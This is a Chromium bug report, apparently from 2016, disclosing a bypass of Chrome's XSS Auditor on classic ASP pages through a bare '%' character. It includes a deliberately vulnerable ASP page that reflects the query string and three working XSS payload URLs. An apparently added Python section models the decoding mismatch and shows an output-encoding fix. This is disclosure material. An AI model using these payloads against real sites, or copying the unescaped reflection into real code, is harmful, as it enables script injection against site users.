XSS Filter Bypass for ASP pages by using single % sign
Reported by ad...@outlook.com, Sep 6 2016
Issue description

UserAgent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36

Steps to reproduce the problem:

This issue was already fixed in issue 613689, but it is reported here again because the original report contains sensitive information that prevents disclosure (security-embargo label). Please close as a duplicate of 613689. Thanks.

The XSS Filter can be bypassed when the vulnerable page is a classic ASP file, simply by using a percent sign (%). There are several examples of vulnerable ASP pages which can be exploited.

"Layer 1: Http.sys (blocked characters = '%'). Http.sys parses URLs in accordance with RFC 2396. You can however configure exceptions using the AllowRestrictedChars registry setting documented in KB 820129. This configuration will never allow a bare '%' character though, because it is expressly forbidden in RFC section 2.4.2, which says: "Because the percent "%" character always has the reserved purpose of being the escape indicator, it must be escaped as "%25" in order to be used as data within a URI. Implementers should be careful not to escape or unescape the same string more than once, since unescaping an already unescaped string might lead to misinterpreting a percent data character as another escaped character, or vice versa in the case of escaping an already escaped string."

Source: http://blogs.iis.net/nazim/use-of-special-characters-like-in-an-iis-url

*** PoC ***

[Environment]
Windows 8.1 64bits
Chrome Version: 50.0.2661.102 stable
Microsoft-IIS/8.5
Classic ASP
Default IIS web site without modifications.
[Code]

<html>
<head>
<title>Google Chrome XSS Auditor Bypass % sign</title>
</head>
<body>
<% Response.Write(Request.QueryString("xss")) %>
</body>
</html>

[Exploit]

http://localhost/Default.asp?xss=<img src=x on%error=alert(document.domain)>
http://localhost/Default.asp?xss=<script s%rc="data:application/javascript,console.log(alert(document.domain));"></script>
http://localhost/Default.asp?xss=<object d%ata="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2b"></object>

Adriano Marcio Monteiro
adriano@brztec.com
@adrianomarcmont
www.brztec.com

What is the expected behavior?

What went wrong?

<html>
<head>
<title>Google Chrome XSS Auditor Bypass % sign</title>
</head>
<body>
<% Response.Write(Request.QueryString("xss")) %>
</body>
</html>

Did this work before? No

Chrome version: 50.0.2661.102 stable
Channel: stable
OS Version: 6.3
Flash Version: Shockwave Flash 22.0 r0
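The root cause in the report is a decoder mismatch: the server-side query-string parser drops a bare '%' so the reflected markup differs from what a request-side filter compared against the URL. The following is an added Python model of that mismatch (not part of the report, and not ASP's own code); the lenient-decoding behaviour is assumed from the PoC, and the encoded variant models the Server.HTMLEncode-style output encoding that closes the hole independently of any client-side filter.

```python
import html
from urllib.parse import unquote

HEX = set("0123456789abcdefABCDEF")


def lenient_unquote(s: str) -> str:
    """Decode %XX escapes but silently drop a '%' that is not followed by two
    hex digits. Constructed model of the lenient decoding the report attributes
    to classic ASP's Request.QueryString; not ASP's actual implementation."""
    buf = bytearray()
    i = 0
    while i < len(s):
        hexpart = s[i + 1:i + 3]
        if s[i] == "%" and len(hexpart) == 2 and set(hexpart) <= HEX:
            buf.append(int(hexpart, 16))
            i += 3
        elif s[i] == "%":
            i += 1  # bare '%' discarded: the characters around it join up
        else:
            buf.extend(s[i].encode("utf-8"))
            i += 1
    return buf.decode("utf-8", errors="replace")


def strict_unquote(s: str) -> str:
    """RFC 2396 view: only valid %XX escapes decode, a bare '%' stays put
    (urllib.parse.unquote already behaves this way)."""
    return unquote(s)


def decoder_mismatch(param: str) -> bool:
    """True when the two decoders disagree, i.e. the value the server reflects
    is not the value a request-side filter would look for in the response."""
    return strict_unquote(param) != lenient_unquote(param)


def reflect_unsafe(param: str) -> str:
    """Models Response.Write(Request.QueryString("xss")): raw reflection."""
    return lenient_unquote(param)


def reflect_safe(param: str) -> str:
    """Same reflection with contextual output encoding applied server-side."""
    return html.escape(lenient_unquote(param), quote=True)


if __name__ == "__main__":
    sample = '<b d%ata-x="1">t</b>'  # constructed: bare '%' inside an attribute name
    print(strict_unquote(sample))    # <b d%ata-x="1">t</b>  (filter's view of the URL)
    print(reflect_unsafe(sample))    # <b data-x="1">t</b>   (what the server emits)
    print(decoder_mismatch(sample))  # True
    print(reflect_safe(sample))      # &lt;b data-x=&quot;1&quot;&gt;t&lt;/b&gt;
```

Flagging requests where `decoder_mismatch` is true is a cheap log-side check for this class of evasion; the durable fix is the output encoding in `reflect_safe`.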
Aug 3 2017
Hi @tsepez! Can you remove the "SecurityTeam permission" and make this report public?
Aug 3 2017
FYI, https://crrev.com/ed036799ce1e2973f98104e57566e2b8fe774c72 was a while ago.
Comment 1 by tsepez@chromium.org, Sep 6 2016
Merged into: 613689
Status: Duplicate (was: Unconfirmed)